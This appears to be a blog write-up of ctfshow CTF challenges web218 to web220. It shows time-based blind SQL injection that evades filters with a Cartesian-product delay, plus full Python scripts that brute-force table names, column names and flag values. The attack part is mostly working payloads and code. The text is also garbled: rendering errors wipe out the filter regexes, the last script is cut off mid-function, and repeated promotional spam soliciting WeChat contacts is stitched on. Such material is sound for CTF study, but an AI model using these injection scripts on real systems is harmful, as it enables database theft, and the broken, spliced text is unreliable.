web218
原始信息
查询语句
where id = ($id);
返回逻辑
//屏蔽危险分子
function waf(KaTeX parse error: Expected '}', got 'EOF' at end of input: …p|benchmark/i',str);
}
解题
这过滤……又要寻找平替方案……
还有一个平替方案,利用大量的查询消耗时间:
if(mid(1,(SELECT COUNT(*) FROM information_schema.tables a, information_schema.tables b, information_schema.tables c,information_schema.tables d),1)
其中的 SELECT COUNT(*) FROM information_schema.tables a, information_schema.tables b, information_schema.tables c,information_schema.tables d 便是起到平替作用的sql查询语句。(笛卡尔积)
如果是使用延迟2s的话,特别考验爆破者的网络环境。特别是这种情况下特别容易出现flag错误的情况。
注意:这里的爆破延迟是1.7s,测试的具体方式是从Burp看回显时间测试出来的。
使用要求:
- 测试者正常回显(非测试笛卡尔积)的情况下延迟在0到1s之间。
- 测试者测试笛卡尔积的时候延迟在1.7或者大于1.7的范围。
下面是脚本:
coding=utf-8
import requests,time,concurrent.futures
from colorama import Fore, Back, Style, init
init()
“”"
单线程爆破
“”"
def GetData5(url,payload,flagStrDict,flag=“”,timeout=3.0,start=1,end=50,mode=1):
“”"
单线程爆破
:param url:目标url
:param payload:payload模板
:param flagStrDict:flag字典
:param flag:flag
:param timeout:超时时间
:param start:开始
:param end:结束
:param mode:模式
:return:
“”"
urls = url + “api/”
headers = {
“Content-Type”: “application/x-www-form-urlencoded;charset=UTF-8”,
“User-Agent”: “Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0”,
“Accept”: “application/json, text/javascript, */*; q=0.01”,
“Accept-Language”: “zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2”,
“Accept-Encoding”: “gzip, deflate”,
“Connection”: “keep-alive”,
“X-Requested-With”: “XMLHttpRequest”,
“Origin”: url,
“Referer”: url,
“Cookie”: “PHPSESSID=jq29mbfflirbma38u1sr7u5i3f”,
}
thresholdNumber = 2
for i in range(start,end):
mf = 0
for mid in flagStrDict:
data = {
“ip”:payload.format(i,mid),
“debug”:1
}
t1 = time.time()
thresholds = 0
使用数据包阈值来过滤废包
经过测试,当前网络环境当中延迟1.7是笛卡尔积的极限。具体测试方法是把数据包转发到BP当中,尝试使用笛卡尔积直接发数据测试极限时间
try:
t = time.time()
req = requests.post(url=urls, headers=headers, data=data,timeout=timeout)
endTime = time.time() - t
time.sleep(0.3)
print(Style.BRIGHT+‘find time’,
Style.RESET_ALL +f": {endTime:.3f} s \t “,
Style.BRIGHT+‘and find payload’,
Style.RESET_ALL +f”: {payload.format(i,mid)}"
)
print(req.content)
except Exception as e:
for threshold in range(thresholdNumber):
try:
t = time.time()
req = requests.post(url=urls, headers=headers, data=data, timeout=timeout)
endTime = time.time() - t
time.sleep(0.3)
print(Style.BRIGHT + ‘find time’,
Style.RESET_ALL + f": {endTime:.3f} s \t “,
Style.BRIGHT + ‘and find payload’,
Style.RESET_ALL + f”: {payload.format(i, mid)}"
)
except Exception as e:
thresholds += 1
print(Fore.RED+‘the number’,Style.BRIGHT+f": {thresholds} ",Style.RESET_ALL + “-”)
endTime = time.time() - t1
if mode == 1 and thresholds == thresholdNumber:
flag += mid
print(f"index: {i}\t all time:{endTime:.3f}\t flag:{flag}")
print(f"{Back.GREEN+‘index’}: {i}“,”\t",f"{Back.GREEN+‘all time’}:“,Style.BRIGHT+f”{endTime:.3f}“,”\t “,Back.GREEN+‘flag’,”:",Style.BRIGHT+f’{flag}',Style.RESET_ALL + “-”)
break
elif mode == 2 and thresholds == thresholdNumber:
flag += chr(int(mid,16))
print(f"{Back.GREEN+‘index’}: {i}\t {Back.GREEN+‘all time’}:{endTime:.3f}\t {Back.GREEN+‘flag’}:{Style.BRIGHT+‘flag’}",end=’ ')
print(f"{Back.GREEN+‘index’}: {i}“,”\t",f"{Back.GREEN+‘all time’}:“,Style.BRIGHT+f”{endTime:.3f}“,”\t “,Back.GREEN+‘flag’,”:",Style.BRIGHT+f’{flag}',Style.RESET_ALL + “-”)
print(Style.RESET_ALL + “-”)
break
else:
mf += 1
print(payload.format(i,mid))
if mf == len(flagStrDict):
print(“flag is :”+flag)
break
if name == “__main__”:
find database/tables/columns
flagStrDict1 = “ctfshow,_0123456789abdegijklmnpqruvxyz”
find flag
flagStrDict2 = “-0123456789abdectfshowgijklmnpqruvxyz}{,_”
flagStrDict3 = “id,flagah,infoctfshow,_0123456789abdegijklmnpqruvxyz”
flagStrDict4 = “id,flagno_0123456789bcehjkmpqrstuvwxyz”
def web218():
url = “http://736e0672-8f98-43d0-ae4d-3660b56cfda7.challenge.ctf.show/”
payload1 = “select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())”
payload2 = “select(group_concat(column_name))from(information_schema.columns)where(table_name=‘ctfshow_flagxc’)”
payload3 = “select(group_concat(flagaac))from(ctfshow_flagxc)”
timeOutFunction = “(SELECT COUNT(*) FROM information_schema.tables a, information_schema.tables b, information_schema.tables c)”
ctfshow_flagxc,ctfshow_info
GetData5(url,flag=‘ctfshow_’,start=9,payload=“if(mid((” + payload1 + “),{},1)=‘{}’,”+timeOutFunction+“,1)”,flagStrDict=flagStrDict1,timeout=1.7)
id,flagaac,info
GetData5(url,payload=“if(mid((” + payload2 + “),{},1)=‘{}’,”+timeOutFunction+“,1)”,flagStrDict=flagStrDict4,timeout=1.7)
“”"
ctfshow{3e19223f-d564-4aae-945e-55a2656f1c27}
ctfshow{3e192230-d564-4aae-945e-56a2656f1c27}
ctfshow{3e19223f-d564-4aae-945e-56a2656f1c27}
“”"
GetData5(url,flag=‘ctfshow{’, start=9, end=55,payload=“if(mid((” + payload3 + “),{},1)=‘{}’,”+timeOutFunction+“,1)”,flagStrDict=flagStrDict2,timeout=1.7)
web218()
多跑两次,flag有一定概率会出错,测试的时候多测试两次不会吃亏。如果能一次提交正确就没必要测了。
web219
原始信息
查询语句
where id = ($id);
返回逻辑
//屏蔽危险分子
function waf(KaTeX parse error: Expected '}', got 'EOF' at end of input: …hmark|rlike/i',str);
}
解题
没有限制到笛卡尔积,沿用上面的脚本即可。
web220
原始信息
查询语句
where id = ($id);
返回逻辑
//屏蔽危险分子
function waf(KaTeX parse error: Expected '}', got 'EOF' at end of input: …|mid|substr/i',str);
}
解题
首先考虑时间盲注,依然还是只能使用笛卡尔积。
其次考虑其它payload点位的限制。
上次的payload是带有concat/mid 两种的,而这两种恰巧对应组合和切割两种情况。
concat 对应限制 group_concat 列组合方法,用 limit {} 1 绕过。 {} 是爆破的第 0 行到第 n 行。
mid 采用 left/right 两种的其中一种进行绕过。这俩都是切割函数,但是没有 mid 的按位置切割,只能从头切割到末尾/从末尾切割到头。
注意:这里还是得注意下网络的延迟问题。延迟测算好后再用payload。
下面是脚本:
coding=utf-8
import requests,time,concurrent.futures
from colorama import Fore, Back, Style, init
init()
def GetData6(url,payload,flagStrDict,flag=“”,timeout=3.0,start=1,end=50,mode=1):
“”"
单线程爆破
:param url:目标url
:param payload:payload模板
:param flagStrDict:flag字典
:param flag:flag
:param timeout:超时时间
:param start:开始
:param end:结束
:param mode:模式
:return:
“”"
urls = url + “api/”
headers = {
“Content-Type”: “application/x-www-form-urlencoded;charset=UTF-8”,
“User-Agent”: “Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0”,
“Accept”: “application/json, text/javascript, */*; q=0.01”,
“Accept-Language”: “zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2”,
“Accept-Encoding”: “gzip, deflate”,
“Connection”: “keep-alive”,
“X-Requested-With”: “XMLHttpRequest”,
“Origin”: url,
“Referer”: url
}
容错数据包次数
thresholdNumber = 4
flagTest = ‘’
控制查表的爆破行
for rows in range(10):
flagTemp = ‘’
flagEnd = flagTemp
控制查表爆破行中的列数据
for columns in range(start,end):
mf = 0
控制查表爆破列的数据匹配
for strDict in flagStrDict:
使用十六进制的形式避免出现非预期情况
payloadEd = ‘0x’+‘’.join([(hex(ord(i))).replace(‘0x’,‘’) for i in flagTemp+strDict])
data = {
“ip”:payload.format(rows,columns,payloadEd),
“debug”:1
}
容错变量
thresholds = 0
使用数据包阈值来过滤废包
经过测试,当前网络环境当中延迟1.7是笛卡尔积的极限。具体测试方法是把数据包转发到BP当中,尝试使用笛卡尔积直接发数据测试极限时间
t1 = time.time()
def miniNumber():
t = time.time()
requests.post(url=urls, headers=headers, data=data, timeout=timeout)
endTime = time.time() - t
time.sleep(0.3)
print(Style.BRIGHT + ‘Find time’, end=“:”)
print(Style.RESET_ALL + f"{endTime:.3f} s \t “, end=”“)
print(Style.BRIGHT + ‘And find payload’, end=‘:’)
print(Style.RESET_ALL + f”{payload.format(rows, columns, payloadEd)}")
try:
miniNumber()
except Exception as e:
经过第一层超时后进行容错处理
for threshold in range(thresholdNumber):
try:
miniNumber()
except Exception as e:
thresholds += 1
print(Fore.RED + ‘the number’,end=" : “)
print(Style.BRIGHT + f”{thresholds} “,end=”")
print(Style.RESET_ALL + “”)
endTime = time.time() - t1
if thresholds == thresholdNumber:
容错成功后组合flag字符串/关键字符串
flagTemp += strDict
print(f"{Back.GREEN + ‘index’}: {rows} {columns}“, end=”\t")
print(f"{Back.GREEN + ‘all time’}“,end=”:“)
print(Style.BRIGHT + f”{endTime:.3f}“,end=”\t “)
print(Back.GREEN + ‘flag’, end=”😊
print(Style.BRIGHT + f’{flagTemp}‘,end=’')
print(Style.RESET_ALL + “”)
break
else:
mf += 1
if mf == len(flagStrDict):
#列数据结束标志
print(“flag is :” + flagTemp)
print(‘all :’,flagTest)
break
if ‘’ == flagTemp:
#行数据结束标志
print(‘flag is :’ + flagTest)
break
else:
flagTest += flagTemp if flagTest == ‘’ else ‘,’+flagTemp
print(flagTest)
if name == “__main__”:
字符串字典
find database/tables/columns
flagStrDict1 = “ctfshow,_0123456789abdegijklmnpqruvxyz”
find flag
flagStrDict2 = “-0123456789abdectfshowgijklmnpqruvxyz}{,_”
flagStrDict4 = “id,flagno_0123456789bcehjkmpqrstuvwxyz”
def web220():
url = “http://8f817a4c-a121-4798-8e3c-35669806ab66.challenge.ctf.show/”
payload1 = “select(table_name)from(information_schema.tables)where(table_schema=database()) limit {},1”
payload2 = “select(column_name)from(information_schema.columns)where(table_name=‘ctfshow_flagxcac’) limit {},1”
payload3 = “select(flagaabcc)from(ctfshow_flagxcac) limit {},1”
print(url)
“”"
payload
if(left((select(xxx)from(yyyy0)limit {3},1),{1})=‘{2}’,?,1)
切割的办法:
假设:a=ctfshow_flagxca
left(a,1) = c
left(a,2) = ct
left(a,3) = ctf
3 点位,列点位1个,行点位2个 该修改爆破的框架了
“”"
timeOutFunction = “(SELECT COUNT(*) FROM information_schema.tables a, information_schema.tables b, information_schema.tables c)”
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!
由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新
如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!
王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。
对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!
【完整版领取方式在文末!!】
93道网络安全面试题
内容实在太多,不一一截图了
黑客学习资源推荐
最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
😝朋友们如果有需要的话,可以联系领取~
1️⃣零基础入门
① 学习路线
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
② 路线对应学习视频
同时每个成长路线对应的板块都有配套的视频提供:
2️⃣视频配套工具&国内外网安书籍、文档
① 工具
② 视频
③ 书籍
资源较为敏感,未展示全面,需要的最下面获取
② 简历模板
因篇幅有限,资料较为敏感仅展示部分资料,添加上方即可获取👆
一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
onvert/769b7e13b39771b3a6e4397753dab12e.png#pic_center)
资源较为敏感,未展示全面,需要的最下面获取
② 简历模板
因篇幅有限,资料较为敏感仅展示部分资料,添加上方即可获取👆
一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
[外链图片转存中…(img-v3ItwMlD-1712480128748)]
扫一扫
7321
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
